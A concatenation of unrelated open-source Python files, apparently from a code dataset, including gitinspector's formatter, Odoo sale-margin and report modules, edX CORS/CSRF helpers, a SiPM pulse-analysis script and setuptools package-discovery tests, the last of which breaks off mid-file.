elif token == 'import' and start[1] == 0:
modules = _getnamelist(g)
for mod, _mod2 in modules:
try:
# Recursively read the imported module
if inpackage is None:
_readmodule(mod, path)
else:
try:
_readmodule(mod, path, inpackage)
except ImportError:
_readmodule(mod, [])
except:
# If we can't find or parse the imported module,
# too bad -- don't die here.
pass
elif token == 'from' and start[1] == 0:
mod, token = _getname(g)
if not mod or token != "import":
continue
names = _getnamelist(g)
try:
# Recursively read the imported module
d = _readmodule(mod, path, inpackage)
except:
# If we can't find or parse the imported module,
# too bad -- don't die here.
continue
# add any classes that were defined in the imported module
# to our name space if they were mentioned in the list
for n, n2 in names:
if n in d:
dict[n2 or n] = d[n]
elif n == '*':
# don't add names that start with _
for n in d:
if n[0] != '_':
dict[n] = d[n]
except StopIteration:
pass
f.close()
return dict
def _getnamelist(g):
# Helper to get a comma-separated list of dotted names plus 'as'
# clauses. Return a list of pairs (name, name2) where name2 is
# the 'as' name, or None if there is no 'as' clause.
names = []
while True:
name, token = _getname(g)
if not name:
break
if token == 'as':
name2, token = _getname(g)
else:
name2 = None
names.append((name, name2))
while token != "," and "\n" not in token:
token = g.next()[1]
if token != ",":
break
return names
def _getname(g):
# Helper to get a dotted name, return a pair (name, token) where
# name is the dotted name, or None if there was no dotted name,
# and token is the next input token.
parts = []
tokentype, token = g.next()[0:2]
if tokentype != NAME and token != '*':
return (None, token)
parts.append(token)
while True:
tokentype, token = g.next()[0:2]
if token != '.':
break
tokentype, token = g.next()[0:2]
if tokentype != NAME:
break
parts.append(token)
return (".".join(parts), token)
def _main():
# Main program for testing.
import os
mod = sys.argv[1]
if os.path.exists(mod):
path = [os.path.dirname(mod)]
mod = os.path.basename(mod)
if mod.lower().endswith(".py"):
mod = mod[:-3]
else:
path = []
dict = readmodule_ex(mod, path)
objs = dict.values()
objs.sort(lambda a, b: cmp(getattr(a, 'lineno', 0),
getattr(b, 'lineno', 0)))
for obj in objs:
if isinstance(obj, Class):
print "class", obj.name, obj.super, obj.lineno
methods = sorted(obj.methods.iteritems(), key=itemgetter(1))
for name, lineno in methods:
if name != "__path__":
print " def", name, lineno
elif isinstance(obj, Function):
print "def", obj.name, obj.lineno
if __name__ == "__main__":
_main()
|
gitisaac/gitinspector
|
refs/heads/master
|
gitinspector/format.py
|
46
|
# coding: utf-8
#
# Copyright © 2012-2014 Ejwa Software. All rights reserved.
#
# This file is part of gitinspector.
#
# gitinspector is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# gitinspector is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gitinspector. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
from __future__ import unicode_literals
import localization
import version
import base64
import basedir
import os
import terminal
import textwrap
import time
import zipfile
__available_formats__ = ["html", "htmlembedded", "text", "xml"]
DEFAULT_FORMAT = __available_formats__[2]
__selected_format__ = DEFAULT_FORMAT
class InvalidFormatError(Exception):
def __init__(self, msg):
super(InvalidFormatError, self).__init__(msg)
self.msg = msg
def select(format):
global __selected_format__
__selected_format__ = format
return format in __available_formats__
def get_selected():
return __selected_format__
def is_interactive_format():
return __selected_format__ == "text"
def __output_html_template__(name):
template_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), name)
file_r = open(template_path, "rb")
return file_r.read().decode("utf-8", "replace")
def __get_zip_file_content__(name, file_name="/html/flot.zip"):
zip_file = zipfile.ZipFile(basedir.get_basedir() + file_name, "r")
content = zip_file.read(name)
zip_file.close()
return content.decode("utf-8", "replace")
def output_header():
if __selected_format__ == "html" or __selected_format__ == "htmlembedded":
base = basedir.get_basedir()
html_header = __output_html_template__(base + "/html/html.header")
tablesorter_js = __get_zip_file_content__("jquery.tablesorter.min.js", "/html/jquery.tablesorter.min.js.zip").encode("latin-1", "replace")
tablesorter_js = tablesorter_js.decode("utf-8", "ignore")
flot_js = __get_zip_file_content__("jquery.flot.js")
pie_js = __get_zip_file_content__("jquery.flot.pie.js")
resize_js = __get_zip_file_content__("jquery.flot.resize.js")
logo_file = open(base + "/html/gitinspector_piclet.png", "rb")
logo = logo_file.read()
logo_file.close()
logo = base64.b64encode(logo)
if __selected_format__ == "htmlembedded":
jquery_js = ">" + __get_zip_file_content__("jquery.js")
else:
jquery_js = " src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js\">"
print(html_header.format(title = _("Repository statistics for {0}").format(os.path.basename(basedir.get_basedir_git())),
jquery = jquery_js,
jquery_tablesorter = tablesorter_js,
jquery_flot = flot_js,
jquery_flot_pie = pie_js,
jquery_flot_resize = resize_js,
logo = logo.decode("utf-8", "replace"),
logo_text = _("The output has been generated by {0} {1}. The statistical analysis tool"
" for git repositories.").format(
"<a href=\"https://gitinspector.googlecode.com\">gitinspector</a>",
version.__version__),
repo_text = _("Statistical information for the repository '{0}' was gathered on {1}.").format(
os.path.basename(basedir. get_basedir_git()), localization.get_date()),
show_minor_authors = _("Show minor authors"),
hide_minor_authors = _("Hide minor authors"),
show_minor_rows = _("Show rows with minor work"),
hide_minor_rows = _("Hide rows with minor work")))
elif __selected_format__ == "xml":
print("<gitinspector>")
print("\t<version>" + version.__version__ + "</version>")
print("\t<repository>" + os.path.basename(basedir. get_basedir_git()) + "</repository>")
print("\t<report-date>" + time.strftime("%Y/%m/%d") + "</report-date>")
else:
print(textwrap.fill(_("Statistical information for the repository '{0}' was gathered on {1}.").format(
os.path.basename(basedir.get_basedir_git()), localization.get_date()), width=terminal.get_size()[0]))
def output_footer():
if __selected_format__ == "html" or __selected_format__ == "htmlembedded":
base = basedir.get_basedir()
html_footer = __output_html_template__(base + "/html/html.footer")
print(html_footer)
elif __selected_format__ == "xml":
print("</gitinspector>")
|
elena/django
|
refs/heads/master
|
tests/apps/explicit_default_config_mismatch_app/apps.py
|
21
|
from django.apps import AppConfig
class ImplicitDefaultConfigMismatch(AppConfig):
name = 'apps.explicit_default_config_mismatch_app'
|
dahlstrom-g/intellij-community
|
refs/heads/master
|
python/testData/resolve/multiFile/pkgResourcesNamespaceWithDocstring/root1/pkg/a.py
|
64
|
import pkg.second
# <ref>
|
MalloyPower/parsing-python
|
refs/heads/master
|
front-end/testsuite-python-lib/Python-2.4.3/Lib/plat-mac/Carbon/AH.py
|
82
|
from _AH import *
|
igemsoftware2017/USTC-Software-2017
|
refs/heads/master
|
tests/core/files/test_views.py
|
1
|
from rest_framework.test import APITestCase
from django.urls import reverse
from django.test import override_settings
from biohub.accounts.models import User
from ._utils import open_sample
@override_settings(DEBUG=True)
class Test(APITestCase):
def test_upload_fail(self):
url = reverse('default:files:upload')
self.assertEqual(403,
self.client.post(url, {}).status_code)
def test_upload(self, filename='2.txt.txt'):
url = reverse('default:files:upload')
me = User.objects.create_test_user('me')
self.client.force_authenticate(me)
sample = open_sample(filename)
content = sample.read()
sample.seek(0)
# Phase 1
resp = self.client.post(url + '?store_db=1', dict(file=sample))
self.assertIn('id', resp.data)
self.assertEqual(resp.data['name'], filename)
self.assertEqual(
content,
b''.join(
self.client.get(resp.data['file']).streaming_content))
# Phase 2
sample.seek(0)
resp = self.client.post(url, dict(file=sample))
self.assertNotIn('id', resp.data)
self.assertEqual(
content,
b''.join(
self.client.get(resp.data['file']).streaming_content))
def test_upload2(self):
self.test_upload('2')
|
gregorv/sipm_analyse
|
refs/heads/master
|
extract_pulse_spectrum.py
|
1
|
# -*- coding: utf-8 -*-
import platform
if platform.python_implementation() == "PyPy":
import numpypy
else:
import matplotlib.pyplot as plt
from scipy.optimize import leastsq
fig = plt.figure()
import numpy as np
#import scipy
import datafile
import sys
import os
import time
import argparse
from pulse import *
filter_kernel = None
def get_events(t, sig):
a = filter(lambda x: (x[1]-x[0]) > 2 or not x[2], flankenize(t, sig))
#for x in collapse_flanks(a):
#print not x[2], sig[x[1]] - sig[x[0]]
b = filter(lambda x: not x[2] and (sig[x[1]] - sig[x[0]]) < -5, collapse_flanks(a))
#plt.plot(t, sig, "x-")
#for start_idx, end_idx, pos in b:
#print [t[start_idx], t[end_idx]], [sig[start_idx], sig[end_idx]]
#plt.plot([t[start_idx], t[end_idx]],
#[sig[start_idx], sig[end_idx]], color="red")
#fig.savefig("test.pdf")
#fig.clf()
return [t[end_idx] for start_idx, end_idx, pos in b]
def process_frame(number, t, sig):
t, smooth_signal = integrate_signal(t, sig)
# Get events
events = get_events(t, smooth_signal)
# Fit exp. curve to get each events amplitude
result = []
t_0 = None
for i, t_ev in enumerate(events):
try:
t_ev_next = events[i+1]
except IndexError:
t_ev_next = None
t_ev_fit, amplitude = fit_decay(t, sig, t_ev, t_ev_next)
#print "x_1", x
if t_ev_fit-200 < 0.0 or t_ev_fit > t[-1]:
continue
if amplitude > 1000.0:
sys.stderr.write("\nSorted out! Frame idx {0}\n".format(number))
return []
if t_0 is None:
t_0 = t_ev_fit
else:
result.append((t_ev_fit-t_0, amplitude))
# prepare return set
return result
def process_frame_quick(number, t, sig):
t_start = 200
t, smooth_signal = integrate_signal(t, sig)
#plt.plot(t, smooth_signal)
#plt.savefig("test.png")
#plt.clf()
# Get events
a = filter(lambda x: (x[1]-x[0]) > 2 or not x[2], flankenize(t, smooth_signal))
b = filter(lambda x: not x[2] and (smooth_signal[x[1]] - smooth_signal[x[0]]) < -5, collapse_flanks(a))
c = filter(lambda x: int(t_start/(t[-1] - t[0])*len(t)) < x[0], b)
events = []
for start_idx, end_idx, _ in c:
end_idx -= 3 # empiric offset
events.append((t[end_idx],
sig[end_idx] - sig[start_idx]))
if len(events) > 1:
return [(t_ev-events[0][0], amplitude)
for t_ev, amplitude
in events[1:]]
else:
return []
def process_frame_full_spectrum(number, t, sig):
t, smooth_signal = integrate_signal(t, sig)
a = filter(lambda x: (x[1]-x[0]) > 2 or
not x[2], flankenize(t, smooth_signal))
b = filter(lambda x: not x[2] and
(smooth_signal[x[1]] - smooth_signal[x[0]]) < -5,
collapse_flanks(a))
return [(t[end_idx],
sig[end_idx] - sig[start_idx])
for start_idx, end_idx, pos in b]
def integrate_signal(time, signal):
new_sig = []
half_window_size = 5
for i in xrange(len(signal)):
used_samples = 0
sig = 0
for j in xrange(i-half_window_size, i+half_window_size):
try:
sig += signal[j]
used_samples += 1
except IndexError:
pass
sig /= used_samples
new_sig.append(sig)
return time, new_sig
def time_string(seconds):
s = ""
seconds = int(seconds)
if (seconds / 86400) > 0:
s = ''.join((s, str(seconds / 86400), "d "))
seconds %= 86400
if (seconds / 3600) > 0:
s = ''.join((s, str(seconds / 3600), "h "))
seconds %= 3600
if (seconds / 60) > 0:
s = ''.join((s, str(seconds / 60), "m "))
seconds %= 60
return ''.join((s, str(seconds), "s"))
if __name__ == "__main__":
parser = argparse.ArgumentParser(sys.argv[0])
parser.add_argument("-d", "--dataset", default=None, metavar="dataset")
parser.add_argument("-o", "--outfile", default='', metavar="outfile")
parser.add_argument("-s", "--silent", default=False, action="store_true")
parser.add_argument("-q", "--quick-and-dirty", default=False, action="store_true")
parser.add_argument("-S", "--full-spectrum", default=False, action="store_true", help="If set, *all* pulses in the frame are placed in output. The default is to write only the pulses after a certain initial pulse that occured in a certain time-range. The -S output is used for countrates, without it, it is usefull for time-structure analysis (after-pulsing etc.)")
parser.add_argument("data", nargs="+", type=str)
args = parser.parse_args()
if args.outfile:
try:
f = open(args.outfile, "r")
f.close()
while 1:
sys.stderr.write("Target file '{0}' already exists. Overwrite and continue? [y/N] ".format(args.outfile))
answer = raw_input()
if answer.lower() == "y":
break
elif answer.lower() in ("n", ""):
sys.exit(0)
except IOError:
# file does not exist
pass
outfile = open(args.outfile, "w")
else:
outfile = sys.stdout
try:
if args.dataset:
dataset = set()
groups = args.dataset.split(",")
for g in groups:
if ":" in g:
low, high = map(int, g.split(":"))
dataset.update(range(low, high+1))
else:
dataset.add(int(g))
else:
dataset = None
num_frames, num_frames_processed = 0, 0
clock_start = 0
clock_end = 0
try:
info = datafile.get_dta_info(args.data[0])
if info:
header = datafile.get_dta_userheader(args.data[0])
out_header = ("# "+"\n# ".join(("{0} = {1}".format(*k)
for k in header.iteritems())
) + "\n"
if len(header) > 0 else "")
out_header += "# full_spectrum_b = {0}\n".format("True" if args.full_spectrum else "False")
outfile.write("\n## Original user header\n{0}##\n\n".format(out_header))
except Exception:
outfile.write("# full_spectrum_b = {0}\n".format("True" if args.full_spectrum else "False"))
raise
if args.quick_and_dirty:
process_function = process_frame_quick
else:
process_function = process_frame
if args.full_spectrum:
process_function = process_frame_full_spectrum
def print_status():
#elapsed_time = (time.clock() if clock_end == 0 else clock_end) - clock_start
elapsed_time = time.clock() - clock_start
if num_frames_processed > 0:
time_remaining = elapsed_time/num_frames_processed * (num_frames - num_frames_processed)
sys.stderr.write("\33[2K\rProcess frame {0} of {1}, {2} elapsed, {3:.1f}ms/frame, about {4} remaining"
.format(num_frames_processed,
num_frames,
time_string(elapsed_time),
elapsed_time/num_frames_processed*1000.0 if num_frames_processed > 0 else 0.0,
time_string(time_remaining) if num_frames_processed > 0 else '?'
)
)
outfile.flush()
if args.data[0].endswith("/"):
dirname = os.path.basename(args.data[0][:-1])
else:
dirname = os.path.basename(args.data[0])
output_name = dirname+".csv"
clock_start = time.clock()
outfile.write("# Source data: "+", ".join(args.data))
outfile.write("\n#Delta T(ns)\tAmplitude(mV)\tFrame Idx\n")
for num_frames, frame_idx, t, signal in datafile.get_all_data(args.data,
dataset):
#if dataset is not None and frame_idx not in dataset:
#continue
try:
if 1 and (num_frames_processed % 50) == 0:
try:
print_status()
sys.stdout.flush()
except ZeroDivisionError:
pass
event_list = process_function(frame_idx, t, signal)
for delta_t, amplitude in event_list:
outfile.write("{0}\t{1}\t{2}\n".format(delta_t, amplitude, frame_idx))
num_frames_processed += 1
except KeyboardInterrupt:
clock_end = time.clock()
if not args.silent:
print_status()
sys.stderr.write("\nKeyboard interrupt, save recent datapoints\n")
break
else:
clock_end = time.clock()
if not args.silent:
print_status()
sys.stderr.write("\nAll frames processed\n")
finally:
outfile.close()
#print "Results will be written to", output_name
#if not 0:
#print "No events? O.o"
#elif len(time_differences) < 2:
#print "Not enough events"
##else:
#fig = plt.figure()
#plt.xlabel(u"Zeitabstand (ns)")
#plt.ylabel(u"Zählrate")
#plt.text("Hallo")
#plt.hist(time_differences, bins=30, log=True)
#plt.savefig("time_difference_histogram.pdf")
#del fig
|
manashmndl/LearningPyQt
|
refs/heads/master
|
ML/ProjectEEESwissKnife/ProjectEEESwissKnife/ProjectEEESwissKnife.py
|
1
|
from ui_plottercreator import *
import sys
class PlotterCreator(QtGui.QDialog):
def __init__(self, parent = None):
QtGui.QWidget.__init__(self, parent)
self.ui = Ui_PlotterCreator()
self.ui.setupUi(self)
QtCore.QObject.connect(self.ui.noOfDataLineEdit, QtCore.SIGNAL('textEdited(QString)'), self.parseData)
"""
Convert 1 2 3 into 1:2:3
"""
def parseData(self, input_string = ""):
self.parsedString = str(input_string)
self.parsedString = self.parsedString.replace(' ', ':')
self.ui.noOfDataLineEdit.setText(self.parsedString)
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
PlotterCreatorApp = PlotterCreator()
PlotterCreatorApp.show()
sys.exit(app.exec_())
|
Communities-Communications/cc-odoo
|
refs/heads/master
|
addons/website_report/report.py
|
257
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.addons.web.http import request
from openerp.osv import osv
class Report(osv.Model):
_inherit = 'report'
def translate_doc(self, cr, uid, doc_id, model, lang_field, template, values, context=None):
if request and hasattr(request, 'website'):
if request.website is not None:
v = request.website.get_template(template)
request.session['report_view_ids'].append({
'name': v.name,
'id': v.id,
'xml_id': v.xml_id,
'inherit_id': v.inherit_id.id,
'header': False,
'active': v.active,
})
return super(Report, self).translate_doc(cr, uid, doc_id, model, lang_field, template, values, context=context)
def render(self, cr, uid, ids, template, values=None, context=None):
if request and hasattr(request, 'website'):
if request.website is not None:
request.session['report_view_ids'] = []
return super(Report, self).render(cr, uid, ids, template, values=values, context=context)
|
vermpy/thespotlight
|
refs/heads/master
|
src/interviews/templatetags/order_by.py
|
1
|
from django.template import Library
register = Library()
@register.filter_function
def order_by(queryset, args):
args = [x.strip() for x in args.split(',')]
return queryset.order_by(*args)
|
SerCeMan/intellij-community
|
refs/heads/master
|
python/helpers/docutils/parsers/rst/languages/pl.py
|
56
|
# $Id$
# Author: Robert Wojciechowicz <rw@smsnet.pl>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Polish-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
u'uwaga': 'attention',
u'ostro\u017cnie': 'caution',
u'niebezpiecze\u0144stwo': 'danger',
u'b\u0142\u0105d': 'error',
u'wskaz\u00f3wka': 'hint',
u'wa\u017cne': 'important',
u'przypis': 'note',
u'rada': 'tip',
u'ostrze\u017cenie': 'warning',
u'upomnienie': 'admonition',
u'ramka': 'sidebar',
u'temat': 'topic',
u'blok-linii': 'line-block',
u'sparsowany-litera\u0142': 'parsed-literal',
u'rubryka': 'rubric',
u'epigraf': 'epigraph',
u'highlights': 'highlights', # FIXME no polish equivalent?
u'pull-quote': 'pull-quote', # FIXME no polish equivalent?
u'z\u0142o\u017cony': 'compound',
u'kontener': 'container',
#'questions': 'questions',
u'tabela': 'table',
u'tabela-csv': 'csv-table',
u'tabela-listowa': 'list-table',
#'qa': 'questions',
#'faq': 'questions',
u'meta': 'meta',
#'imagemap': 'imagemap',
u'obraz': 'image',
u'rycina': 'figure',
u'do\u0142\u0105cz': 'include',
u'surowe': 'raw',
u'zast\u0105p': 'replace',
u'unikod': 'unicode',
u'data': 'date',
u'klasa': 'class',
u'rola': 'role',
u'rola-domy\u015blna': 'default-role',
u'tytu\u0142': 'title',
u'tre\u015b\u0107': 'contents',
u'sectnum': 'sectnum',
u'numeracja-sekcji': 'sectnum',
u'nag\u0142\u00f3wek': 'header',
u'stopka': 'footer',
#'footnotes': 'footnotes',
#'citations': 'citations',
u'target-notes': 'target-notes', # FIXME no polish equivalent?
u'restructuredtext-test-directive': 'restructuredtext-test-directive'}
"""Polish name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
u'skr\u00f3t': 'abbreviation',
u'akronim': 'acronym',
u'indeks': 'index',
u'indeks-dolny': 'subscript',
u'indeks-g\u00f3rny': 'superscript',
u'referencja-tytu\u0142': 'title-reference',
u'referencja-pep': 'pep-reference',
u'referencja-rfc': 'rfc-reference',
u'podkre\u015blenie': 'emphasis',
u'wyt\u0142uszczenie': 'strong',
u'dos\u0142ownie': 'literal',
u'referencja-nazwana': 'named-reference',
u'referencja-anonimowa': 'anonymous-reference',
u'referencja-przypis': 'footnote-reference',
u'referencja-cytat': 'citation-reference',
u'referencja-podstawienie': 'substitution-reference',
u'cel': 'target',
u'referencja-uri': 'uri-reference',
u'uri': 'uri-reference',
u'url': 'uri-reference',
u'surowe': 'raw',}
"""Mapping of Polish role names to canonical role names for interpreted text.
"""
|
cyanna/edx-platform
|
refs/heads/master
|
common/djangoapps/cors_csrf/helpers.py
|
162
|
"""Helper methods for CORS and CSRF checks. """
import logging
import urlparse
import contextlib
from django.conf import settings
log = logging.getLogger(__name__)
def is_cross_domain_request_allowed(request):
"""Check whether we should allow the cross-domain request.
We allow a cross-domain request only if:
1) The request is made securely and the referer has "https://" as the protocol.
2) The referer domain has been whitelisted.
Arguments:
request (HttpRequest)
Returns:
bool
"""
referer = request.META.get('HTTP_REFERER')
referer_parts = urlparse.urlparse(referer) if referer else None
referer_hostname = referer_parts.hostname if referer_parts is not None else None
# Use CORS_ALLOW_INSECURE *only* for development and testing environments;
# it should never be enabled in production.
if not getattr(settings, 'CORS_ALLOW_INSECURE', False):
if not request.is_secure():
log.debug(
u"Request is not secure, so we cannot send the CSRF token. "
u"For testing purposes, you can disable this check by setting "
u"`CORS_ALLOW_INSECURE` to True in the settings"
)
return False
if not referer:
log.debug(u"No referer provided over a secure connection, so we cannot check the protocol.")
return False
if not referer_parts.scheme == 'https':
log.debug(u"Referer '%s' must have the scheme 'https'")
return False
domain_is_whitelisted = (
getattr(settings, 'CORS_ORIGIN_ALLOW_ALL', False) or
referer_hostname in getattr(settings, 'CORS_ORIGIN_WHITELIST', [])
)
if not domain_is_whitelisted:
if referer_hostname is None:
# If no referer is specified, we can't check if it's a cross-domain
# request or not.
log.debug(u"Referrer hostname is `None`, so it is not on the whitelist.")
elif referer_hostname != request.get_host():
log.info(
(
u"Domain '%s' is not on the cross domain whitelist. "
u"Add the domain to `CORS_ORIGIN_WHITELIST` or set "
u"`CORS_ORIGIN_ALLOW_ALL` to True in the settings."
), referer_hostname
)
else:
log.debug(
(
u"Domain '%s' is the same as the hostname in the request, "
u"so we are not going to treat it as a cross-domain request."
), referer_hostname
)
return False
return True
@contextlib.contextmanager
def skip_cross_domain_referer_check(request):
"""Skip the cross-domain CSRF referer check.
Django's CSRF middleware performs the referer check
only when the request is made over a secure connection.
To skip the check, we patch `request.is_secure()` to
False.
"""
is_secure_default = request.is_secure
request.is_secure = lambda: False
try:
yield
finally:
request.is_secure = is_secure_default
|
marceloomens/appointments
|
refs/heads/master
|
appointments/apps/timeslots/migrations/0004_auto_20141103_0840.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('timeslots', '0003_auto_20141102_0853'),
]
operations = [
migrations.AlterField(
model_name='holiday',
name='reason',
field=models.CharField(default=b'', max_length=128, verbose_name='reason', blank=True),
preserve_default=True,
),
]
|
hmen89/odoo
|
refs/heads/master
|
addons/sale_margin/sale_margin.py
|
65
|
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
res = super(sale_order_line, self).product_id_change(cr, uid, ids, pricelist, product, qty=qty,
uom=uom, qty_uos=qty_uos, uos=uos, name=name, partner_id=partner_id,
lang=lang, update_tax=update_tax, date_order=date_order, packaging=packaging, fiscal_position=fiscal_position, flag=flag, context=context)
if not pricelist:
return res
frm_cur = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id
to_cur = self.pool.get('product.pricelist').browse(cr, uid, [pricelist])[0].currency_id.id
if product:
purchase_price = self.pool.get('product.product').browse(cr, uid, product).standard_price
price = self.pool.get('res.currency').compute(cr, uid, frm_cur, to_cur, purchase_price, round=False)
res['value'].update({'purchase_price': price})
return res
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = 0
if line.product_id:
if line.purchase_price:
res[line.id] = round((line.price_unit*line.product_uos_qty*(100.0-line.discount)/100.0) -(line.purchase_price*line.product_uos_qty), 2)
else:
res[line.id] = round((line.price_unit*line.product_uos_qty*(100.0-line.discount)/100.0) -(line.product_id.standard_price*line.product_uos_qty), 2)
return res
_columns = {
'margin': fields.function(_product_margin, string='Margin',
store = True),
'purchase_price': fields.float('Cost Price', digits=(16,2))
}
class sale_order(osv.osv):
_inherit = "sale.order"
def _product_margin(self, cr, uid, ids, field_name, arg, context=None):
result = {}
for sale in self.browse(cr, uid, ids, context=context):
result[sale.id] = 0.0
for line in sale.order_line:
result[sale.id] += line.margin or 0.0
return result
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
_columns = {
'margin': fields.function(_product_margin, string='Margin', help="It gives profitability by calculating the difference between the Unit Price and the cost price.", store={
'sale.order.line': (_get_order, ['margin'], 20),
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 20),
}),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
buhii/tomato
|
refs/heads/master
|
tomato/__init__.py
|
1
|
from tomato.swf_processor import Swf
from tomato.swf_image_replacer import SwfImage
from tomato.swf_injector import create_swf
|
Jollytown/Garuda
|
refs/heads/master
|
server/garuda/lib/python2.7/site-packages/setuptools/tests/test_find_packages.py
|
151
|
"""Tests for setuptools.find_packages()."""
import os
import sys
import shutil
import tempfile
import platform
import pytest
import setuptools
from setuptools import find_packages
find_420_packages = setuptools.PEP420PackageFinder.find
# modeled after CPython's test.support.can_symlink
def can_symlink():
TESTFN = tempfile.mktemp()
symlink_path = TESTFN + "can_symlink"
try:
os.symlink(TESTFN, symlink_path)
can = True
except (OSError, NotImplementedError, AttributeError):
can = False
else:
os.remove(symlink_path)
globals().update(can_symlink=lambda: can)
return can
def has_symlink():
bad_symlink = (
# Windows symlink directory detection is broken on Python 3.2
platform.system() == 'Windows' and sys.version_info[:2] == (3,2)
)
return can_symlink() and not bad_symlink
class TestFindPackages:
def setup_method(self, method):
self.dist_dir = tempfile.mkdtemp()
self._make_pkg_structure()
def teardown_method(self, method):
shutil.rmtree(self.dist_dir)
def _make_pkg_structure(self):
"""Make basic package structure.
dist/
docs/
conf.py
pkg/
__pycache__/
nspkg/
mod.py
subpkg/
assets/
asset
__init__.py
setup.py
"""
self.docs_dir = self._mkdir('docs', self.dist_dir)
self._touch('conf.py', self.docs_dir)
self.pkg_dir = self._mkdir('pkg', self.dist_dir)
self._mkdir('__pycache__', self.pkg_dir)
self.ns_pkg_dir = self._mkdir('nspkg', self.pkg_dir)
self._touch('mod.py', self.ns_pkg_dir)
self.sub_pkg_dir = self._mkdir('subpkg', self.pkg_dir)
self.asset_dir = self._mkdir('assets', self.sub_pkg_dir)
self._touch('asset', self.asset_dir)
self._touch('__init__.py', self.sub_pkg_dir)
self._touch('setup.py', self.dist_dir)
def _mkdir(self, path, parent_dir=None):
if parent_dir:
path = os.path.join(parent_dir, path)
os.mkdir(path)
return path
def _touch(self, path, dir_=None):
if dir_:
path = os.path.join(dir_, path)
fp = open(path, 'w')
fp.close()
return path
def test_regular_package(self):
self._touch('__init__.py', self.pkg_dir)
packages = find_packages(self.dist_dir)
assert packages == ['pkg', 'pkg.subpkg']
def test_exclude(self):
self._touch('__init__.py', self.pkg_dir)
packages = find_packages(self.dist_dir, exclude=('pkg.*',))
assert packages == ['pkg']
def test_include_excludes_other(self):
"""
If include is specified, other packages should be excluded.
"""
self._touch('__init__.py', self.pkg_dir)
alt_dir = self._mkdir('other_pkg', self.dist_dir)
self._touch('__init__.py', alt_dir)
packages = find_packages(self.dist_dir, include=['other_pkg'])
assert packages == ['other_pkg']
def test_dir_with_dot_is_skipped(self):
shutil.rmtree(os.path.join(self.dist_dir, 'pkg/subpkg/assets'))
data_dir = self._mkdir('some.data', self.pkg_dir)
self._touch('__init__.py', data_dir)
self._touch('file.dat', data_dir)
packages = find_packages(self.dist_dir)
assert 'pkg.some.data' not in packages
def test_dir_with_packages_in_subdir_is_excluded(self):
"""
Ensure that a package in a non-package such as build/pkg/__init__.py
is excluded.
"""
build_dir = self._mkdir('build', self.dist_dir)
build_pkg_dir = self._mkdir('pkg', build_dir)
self._touch('__init__.py', build_pkg_dir)
packages = find_packages(self.dist_dir)
assert 'build.pkg' not in packages
@pytest.mark.skipif(not has_symlink(), reason='Symlink support required')
def test_symlinked_packages_are_included(self):
"""
A symbolically-linked directory should be treated like any other
directory when matched as a package.
Create a link from lpkg -> pkg.
"""
self._touch('__init__.py', self.pkg_dir)
linked_pkg = os.path.join(self.dist_dir, 'lpkg')
os.symlink('pkg', linked_pkg)
assert os.path.isdir(linked_pkg)
packages = find_packages(self.dist_dir)
assert 'lpkg' in packages
def _assert_packages(self, actual, expected):
assert set(actual) == set(expected)
def test_pep420_ns_package(self):
packages = find_420_packages(
self.dist_dir, include=['pkg*'], exclude=['pkg.subpkg.assets'])
self._assert_packages(packages, ['pkg', 'pkg.nspkg', 'pkg.subpkg'])
def test_pep420_ns_package_no_includes(self):
packages = find_420_packages(
self.dist_dir, exclude=['pkg.subpkg.assets'])
self._assert_packages(packages, ['docs', 'pkg', 'pkg.nspkg', 'pkg.subpkg'])
def test_pep420_ns_package_no_includes_or_excludes(self):
packages = find_420_packages(self.dist_dir)
expected = [
